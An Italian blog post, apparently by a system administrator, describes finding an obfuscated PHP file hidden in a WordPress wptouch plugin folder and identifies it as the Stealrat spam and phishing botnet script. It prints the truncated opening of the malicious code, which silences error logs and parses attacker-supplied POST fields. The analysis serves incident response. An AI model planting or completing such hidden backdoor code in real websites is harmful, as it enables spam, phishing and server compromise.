Sulla stessa macchina in cui era presente quanto descritto a questo post al momento di avviare apache venivano segnalati anche questi errori
Tue Sep 16 16:25:18 2014] [error] [client xxx.xxx.xxx.xxx] PHP Warning: file_exists(): open_basedir restriction in effect. File(/var/www/vhosts/xxxxxxxx/httpdocs/wp-content/wptouch-data/themes/configOzP.php/readme.txt) is not within the allowed path(s): (/var/www/vhosts/xxxxxxxxxx/httpdocs/:/tmp/) in /var/www/vhosts/xxxxxxxxxxxxx/wp-content/plugins/wptouch-pro-3/core/class-wptouch-pro.php on line 1209
(Sono state omesse le informazioni sensibili)
andando a dare un'occhiata al plugin wptouch nel file indicato si trova il codice sottoriportato (riporto al solito le prime righe per evitare usi illeciti)
Anche in questo caso ci si trova davanti a codice Php offuscato e si alza la soglia di attenzione
--------------------------------------
<?php
@error_reporting(0);
@ini_set(chr(101).chr(114).'ror_log',NULL);
@ini_set('log_errors',0);
if (count($_POST) < 2)
{
die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321));
}
$v5031e998 = false;
foreach (array_keys($_POST) as $v3c6e0b8a)
{ switch ($v3c6e0b8a[0])
{ case chr(108):
$vd56b6998 = $v3c6e0b8a; break;
case chr(100): $v8d777f38 = $v3c6e0b8a; break;
case chr(109): $v3d26b0b1 = $v3c6e0b8a; break;
case chr(101); $v5031e998 = true;
break;
}
}
if ($vd56b6998 === '' || $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321));
$v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));
$v01b6e203 = @$_POST[$vd56b6998];
$v8d777f38 = @$_POST[$v8d777f38];
$v3d26b0b1 = @$_POST[$v3d26b0b1];
if ($v5031e998)
{ $v01b6e203 = n9a2d8ce3($v01b6e203);
$v8d777f38 = n9a2d8ce3($v8d777f38);
$v3d26b0b1 = n9a2d8ce3($v3d26b0b1);
}
$v01b6e203 = urldecode(stripslashes($v01b6e203));
$v8d777f38 = urldecode(stripslashes($v8d777f38));
$v3d26b0b1 = urldecode(stripslashes($v3d26b0b1));
if (strpos($v01b6e203, '#',1) != false)
{
$v16a9b63f = preg_split('/#/', $v01b6e203);
$ve2942a04 = count($v16a9b63f);
} else {
$v16a9b63f[0] = $v01b6e203;
$ve2942a04 = 1;
--------------------------------------
in questo caso la ricerca su Internet riporta molti riferimenti con addirittura una sorta di manuale di istruzione pubblicato da TrendMicro. Si tratta di uno script da BotNet denominato Stealrat nato per fare sostanzialmente spamming e pishing
Iscriviti a:
Commenti sul post (Atom)
Perche' investire su Unix
Un libro trovato nel libero scambio alla Coop su cio' che poteva essere e non e' stato...interessante la storia su Unix del primo c...
-
Per lo shield WiFly e' stata effettuata la patch descritta qui Per la connessione del lettore Rfid si usano i seguenti pin VCC ...
-
Questo post e' a seguito di quanto gia' visto nella precedente prova Lo scopo e' sempre il solito: creare un sistema che permet...
-
In questo post viene indicato come creare uno scatterplot dinamico basato da dati ripresi da un file csv (nel dettaglio il file csv e' c...
Nessun commento:
Posta un commento